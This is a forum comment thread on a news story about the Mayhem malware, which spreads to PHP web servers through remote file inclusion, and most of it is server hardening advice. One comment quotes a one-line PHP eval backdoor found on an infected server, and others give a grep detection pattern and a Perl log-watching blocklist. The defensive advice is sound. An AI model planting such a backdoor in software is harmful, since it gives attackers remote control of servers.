Manic malware Mayhem spreads through Linux, FreeBSD web servers

Malware dubbed Mayhem is spreading through Linux and FreeBSD web servers, researchers say. The software nasty uses a grab bag of plugins to cause mischief, and infects systems that are not up to date with security patches. Andrej Kovalev, Konstantin Ostrashkevich and Evgeny Sidorov, who work at Russian internet portal Yandex, …

  1. btrower

    Tired admin

    I have four or five net facing servers and I get dinged from time to time. There is not much you can do except try to keep a low profile. I will be looking at a secure operating environment next month and hopefully, once I can prove it out, I will be able to shift things over to that -- vanilla, vanilla, vanilla.

    The main way to avoid someone breaking into your server is to make sure there is not much worth stealing. Is there anyone with a serious presence on the Internet that has not been compromised at some point? I doubt it.

    1. Ole Juul

      Re: Tired admin

      I'm curious about what you mean by "not much worth stealing". Surely anybody with a "serious presence on the Internet" has bandwidth. That's worth stealing.

    2. ckm5

      Re: Tired admin

      Some tips

      1. Harden your system Ubuntu - http://www.thefanclub.co.za/how-to/how-secure-ubuntu-1204-lts-server-part-1-basics - there are similar guides for other systems

      2. Disable and remove all unused services

      3. Firewall all ports except the ones you use

      4. Auto-update

      5. Two-factor everywhere - both Google's Authenticator & Duo Security work great and are free

      6. Cloudflare - a web app firewall that is free

      7. If you are running Apache, there are some great modules for application security

      8. AppArmor or SE Linux

      9. Remove compilers when not needed

      10. Bandwidth throttling - you can prevent a lot of damage by throttling bandwidth - with Cloudflare acting as a CDN, you should be able to greatly reduce your bandwidth needs.

      Note that people don't break into your system to steal anything; they want remote control over the machine to do things with it (DDoS, distribute malware, etc).

      The point of hardening is the same thing as why you lock your door. It doesn't actually prevent anyone from breaking in, it just makes them move on to easier targets....
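
      For points 2 and 3, a minimal sketch using ufw (present on Ubuntu at least; the three ports below are assumptions - open only whatever you actually serve):

      # default-deny inbound, then punch holes only for the services you run
      ufw default deny incoming
      ufw default allow outgoing
      ufw allow 22/tcp
      ufw allow 80/tcp
      ufw allow 443/tcp
      ufw enable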

      1. ckm5

        Re: Tired admin

        Not sure why the thumbs down, either you want to make sure people have weak systems or you think I'm wrong/misguided/an idiot (perhaps all three).

        Why not comment to improve my comment? That would be way more helpful than a downvote.

        1. Ole Juul

          Re: Tired admin

          Not sure why the thumbs down,

          Wasn't me, but I notice some strange thumbs-downs around here. I've even seen thumbs-down on a question. WTF? It's as if some commentards view everything as a religious belief or something like that. To me, a comment can sometimes be good even if I don't agree with it.

          1. Jamie Jones Silver badge

            Re: Tired admin

            I was once followed for about 2 weeks by someone who downvoted all my posts, however innocent they were.

            And 'Matt Bryant' seems to have had a few downvoting groupies for quite some time!

            As for this case, well, it wasn't me, but maybe someone didn't like your implied assumption that they'd be running Ubuntu? Or that your post dealt with OS-related stuff (thus implying - *gasp* - that Linux has some issues, whilst clearly this is a dumb app/admin issue)?

            1. Destroy All Monsters Silver badge
              Trollface

              Re: Tired admin

              And 'Matt Bryant' seems to have had a few downvoting groupies for quite some time!

              That's because he nasty. And generally wrong.

              1. Matt Bryant Silver badge
                Facepalm

                Re: Destroyed All Braincell's Re: Tired admin

                "That's because he nasty......" Cry more, or better still, grow up,and try a post vaguely to do with the thread. You have heard of Linux, I presume?

                "......And generally wrong." Yes, and you have proven this when? Oh, never, whereas debunking your bleats takes mere minutes.

                Instead of whining, why don't you look through ckm5's useful post and see if you can add anything? I could suggest tying all users to the bash shell as it has a very simple way of dropping their command line activity into ~<username>/.bash_history. I would also suggest changing the syslog.conf to actually write to a file on a remote system but leave a dummy syslog file locally - we picked up an internal user doing stuff he shouldn't because he thought clearing out the history and the local syslog would hide his tracks. Other than that, the best advice is to not just secure your server and leave it, but to regularly (daily if you have the time) trawl through the logs and check for signs of hacking.
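
                For the remote syslog bit, a minimal sketch of the forwarding rule (classic syslog.conf shown, rsyslog accepts the same; 'loghost.example.com' is a placeholder for your log collector):

                # /etc/syslog.conf - send everything to the remote collector (UDP/514)
                *.*    @loghost.example.com
                # TCP variant (rsyslog only):
                *.*    @@loghost.example.com:514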

                1. Anonymous Coward
                  Anonymous Coward

                  Re: Destroyed All Braincell's Tired admin

                  Tie all users to bash? For security? Oh dear.

                  Many shells have got a history file, including posix sh, ksh and others.

                  How about restricted shells for those who need no more?

                  One could say that storing history in a file is bad (gives away a lot of commands, of course).

                  1. Matt Bryant Silver badge
                    Facepalm

                    Re: AC Re: Destroyed All Braincell's Tired admin

                    ".....Many shells have got a history file, including posix sh, ksh and others....." Indeed they do, and many users tweak their HISTFILE attribute and put that history file in many different places, but on all the OSs I have tried, including on hp-ux and AIX (though it does not have official hp support, can't recall if it is by IBM), the history files is in exactly the same place. I try not to let even admins use Korn (on hp-ux at least) because it has a few security issues, like automatically enabling history for root - popular with lazy saysadmins but not good security. If you tie the users to bash, you know where their history is going to be, and it has the added benefit that Linux users get a familiar shell experience when they log into an UNIX system. I also would suggest not allowing direct root login (stops anonymous root logins) and then restricting access to such tools as su so only select users can login and then switch to root.

                    ".....One could say that storing history in a file is bad (gives away a lot of commands, of course)." Part of restricting a users shell is that you make sure they cannot wander out of their restricted set of directories. So, no, they cannot read another user's history file.

          2. Arctic fox
            Thumb Up

            @Ole Juul "a comment can sometimes be good even if I don't agree with it."

            I entirely agree. I have in fact on several occasions upvoted a well written post even where I disagreed with it. If someone clearly is trying to make a contribution (as someone further up has already said) why not post and engage with them? Downvoting and not posting is very often (albeit not always of course) the equivalent to the childhood game of ringing on somebody's doorbell and running away.

            1. Anonymous Coward
              Anonymous Coward

              Re: @Ole Juul "a comment can sometimes be good even if I don't agree with it."

              "Downvoting and not posting is very often (albeit not always of course) the equivalent to the childhood game of ringing on somebody's doorbell and running away."

              Indeed so. Both are excellent fun.

        2. Anonymous Coward
          Anonymous Coward

          Re: Tired admin

          Not sure why the thumbs down, either you want to make sure people have weak systems or you think I'm wrong/misguided/an idiot (perhaps all three).

          Linux is the ultimate virus free secure out of the box system everyone should use

          IOS is the ultimate virus free secure out of the box system everyone should use

          Windows is the ultimate virus riddled out of the box system no-one should use it

          the down voters usually fall into one or other camp /s

        3. Tom 13

          Re: Not sure why the thumbs down

          It wasn't me, but having followed the threads here, I'll wager it was because you were too specific on the OS. In this case some fanbois will be particularly offended that you recommended it in an article about it being compromised by malware. No, it doesn't matter how factually/statistically correct you are.

      2. Don Dumb

        Re: Tired admin

        @ ckm5 -

        4. Auto-update
        Can't argue with most of your tips, but I would disagree with point 4, in particular for business or any other important servers. A sysadmin really should check that every patch works and doesn't break critical services/applications before deploying. Or at the very least, the sysadmin should deploy the patch themselves at a specific time, so that if something does go wrong they are around to fix it and know what they have just done that might have caused it. Leaving updating to an external service/provider is essentially allowing a third party to break your systems outside of your control.

        Auto-update might seem like it makes sense, but even very important, simple and lightweight patches *could* contain a bug that breaks something - especially when the most important patches are often the most rushed. Just look back through the archives of this site and you will see major software houses releasing patches that were buggy, with the patch either withdrawn or itself patched in short order.

        For the sake of a few days, it is worth testing any update, or applying it at a time you can be there to clean up its mess and/or limit the damage.

        1. Robert Helpmann??
          Childcatcher

          Re: Tired admin

          A sysadmin really should check that every patch works and doesn't break critical services/applications before deploying.

          I could not agree more and yet the people who get pissy if the "critical services/applications" aren't working are typically the same bunch who will not fork over the cash to set up development or test environments. I have had to work in several large network environments in which we had to "test in production," which basically means that we target a subset of the overall production environment and see what happens next before proceeding with the rest.

      3. Charlie Clark Silver badge
        Thumb Down

        Re: Tired admin

        This is really a splatter-gun approach which fails to grasp the nature of the attack. Most of the points are reasonable, though I'd argue that a public server should only install and run the services that it needs. Coincidentally, this is the OpenBSD approach.

        As (some) others have noted, the attack uses remote file inclusion on servers running PHP. There is a simple solution to that… ;-) If you do need PHP then configure it so that RFI is not possible. Relying on defaults and auto-updates is not sufficient in this case.
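
        For reference, the relevant php.ini knobs (allow_url_include has shipped Off by default for a long time, but it is worth checking; turning allow_url_fopen off can break code that legitimately fetches remote URLs, so test first):

        ; php.ini - make remote file inclusion impossible
        allow_url_include = Off
        allow_url_fopen = Off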

        Using a CDN to soak up and scrub traffic is certainly a good start but your server will generally still be accessible via a sub-domain or via a port-scan.

      4. Anonymous Coward
        Anonymous Coward

        @ckm5

        Good points, however there's one more which can directly help to prevent nastiness like this:

        * Disallow exec permissions on temp directories such as /tmp and/or /var/tmp.

        * Do the same for the web root directories (/home/client/public_html for example).

        In a lot of (if not most) cases where a webserver gets compromised, the attacker needs a place from which to run their stuff. And since you're usually dealing with script kiddies, they'll most likely stick to commonly known places: the current home directory and, if that doesn't work, /tmp. When that also fails, your average kiddie will be unable to proceed.
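
        A minimal sketch of the /tmp part, assuming /tmp is (or can be made) its own mount - some package install scripts do unpack and run things there, so test before rolling it out widely:

        # /etc/fstab - mount /tmp without exec/suid/dev
        tmpfs   /tmp   tmpfs   defaults,noexec,nosuid,nodev   0 0

        # or, on a running system where /tmp is already a separate mount:
        mount -o remount,noexec,nosuid,nodev /tmp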

    3. Anonymous Coward
      Anonymous Coward

      Re: Tired admin

      "I will be looking at a secure operating environment next month"

      Yeah, we already did the same and migrated all our LAMP stack servers to Windows Server 2012 R2. Relatively painless and far fewer vulnerabilities to worry about now.

  2. PCS

    Maybe after this the penguin lovers will stop looking so bloody smug with their "my OS is virus-proof" arguments.

    1. ~mico
      Facepalm

      virus-proof

      Traditionally, *nix servers were susceptible to worms, and Windows PCs - to viruses. The main difference is the former are "alive", and search and attack vulnerable systems autonomously, while the latter are "dead" and require user interaction in order to spread. This latest malware doesn't change the tradition: it's a worm.

    2. John Tserkezis

      "Maybe after this the penguin lovers will stop looking so bloody smug with their "my OS is virus-proof" arguments."

      Oh bugger off and go back to fondling your fruit. Yes, the half-eaten one presumably because it has a worm in it.

    3. Jamie Jones Silver badge
      Flame

      " Maybe after this the penguin lovers will stop looking so bloody smug with their "my OS is virus-proof" arguments."

      Obvious troll etc.

      But just in case, unlike you, I assume the penguin lovers know the difference between the OS and its applications - the latter of which may have bugs or be configured incorrectly.

      Here's a clue: this malware needs to be downloaded to a server and executed. We aren't talking about fooling the OS into running it - no, it has to be run by a user (i.e. a process, which could be a dæmon - not necessarily a human user).

      I'm sure that if a user executed 'del /s *.*' at a DOS prompt on a Windows machine, not even the most fanatical Linux fanboi would blame Windows for those files being deleted.

      The real issue

      The real issue here is the stupid applications that have bugs that allow arbitrary files to be uploaded and executed in the first place - and morons who type 'chmod 777' on files/directories that they install.

      Furthermore, attacks like these can be mitigated with common sense by *using* standard features of a Unix operating system:

      • NEVER have a dæmon run under the same user as that which owns the code files.
      • Don't enable cron facilities for a dæmon that doesn't need them (or again, run cronjobs via a different user than the one the dæmon runs as)
      • Never blindly run 'chmod 777' on anything [ this particular piece of malware attempts to write to the file /etc/rc.local - *anyone* who runs a machine where that would work should be forced to listen to Justin Bieber non-stop for a week ]
      • Consider running unaudited dæmons in a jailed subsystem (or at least a chroot) - and if your system supports it, use sandboxing/process-restrictions to disable any functions that will never be legitimately needed)
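
      A rough sketch of the first point for a typical Apache/PHP setup (user names and paths are illustrative - the idea is that the daemon can read the code but only write to the one directory that genuinely needs it):

      # code owned by a deploy account, readable but not writeable by the daemon
      chown -R deploy:www-data /var/www/example.com
      chmod -R u=rwX,g=rX,o= /var/www/example.com
      # only the upload directory is writeable by the daemon user
      chown -R www-data /var/www/example.com/uploads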

      1. Steve Holdoway

        Hmmm...

        Every CMS known to man requires a space writeable by the web server / server-side scripts. As such, having all files owned by another user will only protect *part* of your docroot, and so all you're really providing is 'security through obscurity'. If you're not using a CMS, then you can further lock down your docroot by making files (and directories!) immutable, which is about as close to a completely secure solution as you can get.
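
        For reference, the immutable trick looks roughly like this (chattr on Linux ext filesystems, chflags on FreeBSD; you have to remember to undo it before the next deploy, and on FreeBSD schg cannot be cleared while the securelevel forbids it):

        # Linux
        chattr -R +i /var/www/example.com      # lock the docroot
        chattr -R -i /var/www/example.com      # unlock before updating

        # FreeBSD
        chflags -R schg /usr/local/www/example.com
        chflags -R noschg /usr/local/www/example.com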

        Some cron jobs *must* run as the daemon user. A specific example: Magento re-index creates a lock file for each index as it works on it, which ends up owned by the user running the process (assuming they had permission to overwrite it in the first place). This will prevent an interactive run of a reindex from the CMS backend, as the file can't be recreated by the daemon (yes, there are a million and one ways around this, but I'm making a point!).

        Chroot jails are also provably insecure... if you're this bothered about security, then you need to separate via VMs, or the new lightweight alternative, Docker, which I'm desperately trying to find time to investigate further. All other alternatives lull you into a false sense of security to some level.

        I agree 100% on the chmod 777 thing though, anyone who writes this has no concept of *nix file permissions. Any software install instructions containing this requirement prompts me to delete it immediately, and be very circumspect on any other software from the same author.

      2. Tom 13

        Re: not even the most fanatical Linux fanboi would blame windows

        Yes, yes they would. They wouldn't be any more correct than the MS fanbois who are always spouting off about how many vulnerabilities Linux has, but they would. Granted MOST Linux admins wouldn't.

  3. MooJohn

    It's all about mitigation

    You can't stop all attacks; you can only do your best to mitigate them by limiting what the malware can do if it does make it inside. It's the basics like running the web server as a user who can do little else, and specifically blocking access to other areas of the filesystem and even to basic system commands if you can manage it.

    The goal is to leave them with perhaps a site defacement but nothing in the way of "real" access to the rest of that machine or the rest of your network. Look at each user and ask yourself "If this user is compromised, what can it do?" You want it capable of doing its job and as little else as you can get away with!
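
    One cheap way of asking that question is to literally become the user and poke around - a rough sketch, assuming the web server runs as www-data and GNU find is available:

    # what account is the web server actually running as?
    ps -eo user,comm | grep -E 'apache2|httpd|nginx' | sort -u
    # can that account read things it has no business reading?
    sudo -u www-data cat /etc/shadow
    # where can it write outside its docroot?
    sudo -u www-data find / -xdev -type d -writable 2>/dev/null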

    1. Eddy Ito

      Re: It's all about mitigation

      Isn't this exactly what containers are supposed to be for? Give each service its own little sandbox to prevent corruption of the rest of the machine.

      The thing I don't understand is that if they hard coded 8.8.8.8 as the DNS for finding humans.txt couldn't you just set the hosts file to redirect it as a temporary workaround?

      1. Charles 9

        Re: It's all about mitigation

        "The thing I don't understand is that if they hard coded 8.8.8.8 as the DNS for finding humans.txt couldn't you just set the hosts file to redirect it as a temporary workaround?"

        Doesn't it work the other way around, translating a DNS name to a number? Which means 8.8.8.8 or any other direct IPv4 address gets addressed directly? That's how some ad-blockers work: by assigning 127.0.0.1 (localhost) to all the ad-spewing domain names.

        1. Eddy Ito

          Re: It's all about mitigation

          D'oh, that's right. The firewall would have to filter 8.8.8.8 requests.
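
          Something like this as a stop-gap (iptables shown; it also blocks legitimate use of Google's public DNS from that box, and the authors could trivially switch resolvers):

          # drop DNS queries from this host to Google's public resolver
          iptables -A OUTPUT -d 8.8.8.8 -p udp --dport 53 -j DROP
          iptables -A OUTPUT -d 8.8.8.8 -p tcp --dport 53 -j DROP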

  4. Franklin

    Had a Web server (a shared hosting server operated by a big-name hosting provider) get hit by this recently. It dropped a PHP file onto the server that contained the line

    <?php @eval(stripslashes($_REQUEST[ev]));

    from which, as you can imagine, all manner of mayhem became possible.
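
    For anyone who wants to check for that particular flavour of dropper, a quick (and far from exhaustive) sweep of the docroots for eval-on-request-data backdoors is easy enough - the paths are assumptions:

    grep -rl --include='*.php' -E 'eval\s*\(\s*stripslashes\s*\(\s*\$_(REQUEST|POST|GET)' /var/www /home/*/public_html 2>/dev/null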

  5. Destroy All Monsters Silver badge
    Paris Hilton

    The fock?

    How the fuck does one just "drop a PHP file onto the server" which is then executed?

    Do people have ExecCGI on wherever?

    The mind boggles.

    Also, looks like MAYHEM_DEBUG should be set to cause the dropper to exit(0). Do it.

    And what does humans.txt have to do with all of this?

    1. djack

      Re: The fock?

      AFAIK, the malware uses humans.txt as a test to see if RFI is possible. Seems a bit daft and wasteful to me. Implying that Google could prevent this malware (and therefore it's all Google's fault) by changing humans.txt seems a bit disingenuous to me. The test could easily be changed to refer to any other arbitrary file.

    2. Anonymous Coward
      Anonymous Coward

      Re: The fock?

      "How the fuck does one just "drop a PHP file onto the server" which is then executed?"

      People run OSs with very high vulnerability counts and high exploit risks like Linux for Internet facing servers and then don't patch them, and then they run a similarly historically insecure stack on top of them such as Apache, MySQL and PHP....

      1. okcomputer44

        Re: The fock?

        "People run OSs with very high vulnerability counts and high exploit risks like Linux for Internet facing servers"

        Like Linux? Hope you meant like Windows... :)

  6. Christian Berger

    Ahh, so it's PHP malware

    This has very little to do with Linux and FreeBSD, but with PHP, which makes it _really_ hard to write secure code (at least a lot harder than writing insecure code).

  7. vagabondo
    Unhappy

    What century are these guys in?

    "In the *nix world, autoupdate technologies aren't widely used,"

    Maybe 30 years ago (BSD, tapes, and 64kb Internet access), or even Linux 20 years ago. However, a quick look at some old Linux admin manuals shows that by 2001 SuSE shipped with on-line-update as standard. The defaults were to run weekly and apply security patches. I cannot believe that most other *nix systems did not have their equivalents.

    In that time the only update-related problems that I can recall were a Postfix configuration backed up and replaced with an updated default (spotted and fixed within the hour), and a few occasions where users had "cut and pasted" dodgy PHP that stopped working after an update.

    It's really not hard to keep a Linux server tolerably secure. With any decent distribution that is the default, and it does not have a significant cost. You have to decide to do something (stupid) to introduce a meaningful insecurity.

    1. Fibbles

      Re: What century are these guys in?

      Presumably there are admins out there who want to vet every patch before it is applied to make sure it won't bork their system. I'm not a sys admin but if I was I'd rather have to explain to the boss that the server is down because the distro provider arsed up one of their security patches than have to explain that it is down because I hadn't gotten around to applying the latest security patches.

    2. Stuart Castle Silver badge

      Re: What century are these guys in?

      The problem with enabling autoupdate is simple. A patch may break something. This is annoying on a personal level, but usually fixable.

      On an enterprise level, it could be devastating. If that patch broke a system the company relied upon, it could bankrupt the company. You can blame (or even sue) the manufacturer or distribution provider all you want, but that won't bring the company back.

      This is why, as a sys admin, you test every change or patch repeatedly and as thoroughly as is possible. Preferably with multiple testers. This is why patching costs a lot.

      The other problem is that a lot of companies run legacy systems. These systems may require something only offered by a particular version of a system component. However, the company may have no access to the source code for those systems. Even if they have the source code, they may not have access to a development system that can use that source code. Either way, they will be unable to alter the system.

      1. Pseudonymous Coward

        Re: What century are these guys in?

        Not that I actually do this, but I keep thinking I probably should: how about having a sizable set of reasonably thorough tests (Continuous Integration style) for the whole of your environment? Then apply the patch in a TEST environment first, and if those tests all pass it's pretty safe to proceed with an automated update.

        If the tests find issues with the patch, alert the admin (and in the meantime monitor if further incoming patches work better as a whole).
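
        As a rough sketch of that flow on a Debian-ish box (apt-get's -s flag just simulates; run_smoke_tests.sh and the 'prod' host are placeholders):

        # on the TEST box: see what the pending updates would do, then apply them
        apt-get update
        apt-get -s dist-upgrade
        apt-get -y dist-upgrade && ./run_smoke_tests.sh \
          && ssh prod 'apt-get update && apt-get -y dist-upgrade'
        # if the tests fail, the chain stops and production is never touched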

      2. Tom 13

        Re: problem with enabling autoupdate is simple

        This conventional wisdom, much like complex passwords for everything, is one that needs to be re-examined.

        Not all systems are mission critical. In fact, I expect that even most systems that get classified as mission critical don't require the level of security that tests every patch before it is deployed. Those that do most likely have the funds available to do that testing, including the manpower required for it. Next, look at the list of released patches that have broken systems in the last decade. Now compare that with the number of virus signature updates that have broken systems. I think the virus scanners have broken more systems than the patches have, and very few places run without auto-updating their virus sigs every single day. Which means that on a rational basis, most systems can probably be auto-updated with relative safety. Certainly many of them can be, especially user boxes.

    3. Number6

      Re: What century are these guys in?

      My Linux machines tell me when there are new updates available but I have to install them manually. Mind you, I have the work Windows laptop configured to do the same; it's one of the things I do automatically whatever the OS. At the one place that made auto-update a group policy, I made a point of shouting loudly at the IT staff whenever my machine rebooted overnight and lost whatever work I'd left it doing.

    4. Christian Berger

      Re: What century are these guys in?

      I think most Linux distributions had auto-update long before Microsoft even started that near-pointless scrap of an update mechanism they have now.

      1. phuzz Silver badge
        Facepalm

        Re: What century are these guys in?

        According to Wikipedia, the first version of Debian including APT was in 1999; yum seems to be slightly later (~2001). Windows Update was introduced along with Win95. The Apple software updater was introduced in OS 9 (1999). dpkg was originally introduced in 1994, but was just a package installer/remover then, not an update service.

        I'm sure someone had a software update service at the OS level before Win95 but I can't find one. Of course, the cynical among you will argue that an update system was needed more badly by Windows than by any other OS.

        Call me old fashioned, but I remember when software would be released and never updated again.

  8. Anonymous Coward
    Anonymous Coward

    No PHP and dropping.

    I don't have PHP installed, and got fed up with all the scans looking for WordPress login page bugs etc. (some scans try hundreds of PHP things, lasting 5 minutes or more), so I knocked up a bit of Perl that, as soon as it sees a request for or reference to PHP in the server logs, adds the IP to an ipset which is included in my firewall rules - *bang*, the IP is immediately dropped and blocked.

    :)

    1. Destroy All Monsters Silver badge

      Re: No PHP and dropping.

      You nasty bugger!

      1. Anonymous Coward
        Anonymous Coward

        Re: No PHP and dropping.

        Yes, terrible, aren't I... but it does reduce server hits (and bandwidth) by a LARGE amount.

        #!/usr/bin/perl -w

        # Nick - 31/01/2014
        # Public Domain code

        my $line;
        my $log = "/path/to/server/logs/access_log";

        # follow the access log as it grows
        open(LOG, "/usr/bin/tail -F $log |") || die "ERROR: could not open log file.\n";

        while ($line = <LOG>) {
            # anything that looks like a PHP/scanner probe gets its source IP blackholed
            if (   ($line =~ /php/)             || ($line =~ /xml/)
                || ($line =~ /\/manager\/html/) || ($line =~ /w00tw00t/)
                || ($line =~ /x80w/)            || ($line =~ /CONNECT/)
                || ($line =~ /\?\-s/)           || ($line =~ /fck/)
                || ($line =~ /rtpd/)            || ($line =~ /roundcube/)
                || ($line =~ /statics/)         || ($line =~ /access/) || ($line =~ /mail2000/) ) {

                # the client IP is the first field of the log line
                $line =~ s/ .*//g;
                chomp($line);
                `ipset add bh $line -exist`;
                `ipset save bh -f /path/to/ipsets-bh-firewall-file`;
            }
        }
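
        For anyone wanting to try it, the ipset and the firewall rule the script relies on would be created roughly like this (set name 'bh' as used above):

        ipset create bh hash:ip -exist
        iptables -I INPUT 1 -m set --match-set bh src -j DROP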

    2. Number6

      Re: No PHP and dropping.

      I remember one scanner that used to look for a file called "thisdoesnotexist" or similar. Except on my system it did, and provided a 30MB download of random data (this was back in the days when dial-up was still more common).

  9. Anonymous Coward
    Anonymous Coward

    I see 20 to 30 different IP addresses a day attempting the RFI test with the Google humans.txt file - it's been going on since at least the start of the year. I block them, but as with most other attacks there is no response from any of the ISPs / hosting companies if you report it.

    1. Anonymous Coward
      Anonymous Coward

      Problem is, they are all hacked MS Windows machines - the people owning them don't even know what is going on. Also, these scanner bots seem to have some sort of intelligence in that once hit and dropped via the firewall, they never come back - so it appears there is some sort of database of 'who to attack and who not to'.

  10. Anonymous Coward
    Big Brother

    Linux and FreeBSD malware spreading?

    "Malware dubbed Mayhem is spreading through Linux and FreeBSD web servers, researchers say."

    How exactly does this malware get executed on the web servers in the first place?

    1. Charles 9

      Re: Linux and FreeBSD malware spreading?

      By using PHP, which could be on the server as part of a LAMP setup. It tests to see if the server can take in files via Remote File Inclusion (the Google file mentioned is just the test). If it works, it uses RFI to insert a PHP plugin, which then gets added to the web server and given the server's permissions (not that it really matters if the plugin contains a privilege escalation).

      1. Paul Hovnanian Silver badge

        Re: Linux and FreeBSD malware spreading?

        "If it works, it uses RFI to insert a PHP plugin, which then gets added to the web server and given the server's permissions"

        Which means someone has configured their web service to run scripts as a user with administrative permissions (over at least the web server and its components).

        Isn't that a failure of Administration 101?

  11. ldm

    Quick way to check for infection

    On an Ubuntu or Debian system, this'll grep your compressed logs (in the default location, and assuming a sane logformat) for any request containing "humans.txt" that doesn't also return a 404:

    zgrep "humans.txt" /var/log/apache2/* | grep -v " 404 "

    Not exactly bullet proof, but I didn't see any mention in the analysis of the malware altering logs to cover its tracks.

    1. vagabondo

      Re: Quick way to check for infection

      A traditional *nix server will have the locate utility. So:

      :~> locate humans.txt

      will suffice.

      1. Stoneshop
        FAIL

        Re: Quick way to check for infection

        :~> locate humans.txt

        That will just tell you whether you have a file 'humans.txt' on your system, and only if the locate database is up to date. What you actually want to do, and what the poster you replied to did, is look through the Apache logs for an HTTP request for said file hosted on Google - in other words, check whether PHP allows requesting a remote file.

        1. vagabondo
          Facepalm

          Re: Quick way to check for infection -- @Stoneshop

          Thanks for the correction.

          print ("I must wake up before posting. I must not post rubbish!") x 100

  12. This post has been deleted by its author

  13. Gis Bun

    Not a good year for Linux/Unix. This, OpenSSL and then a further bug in OpenSSL.
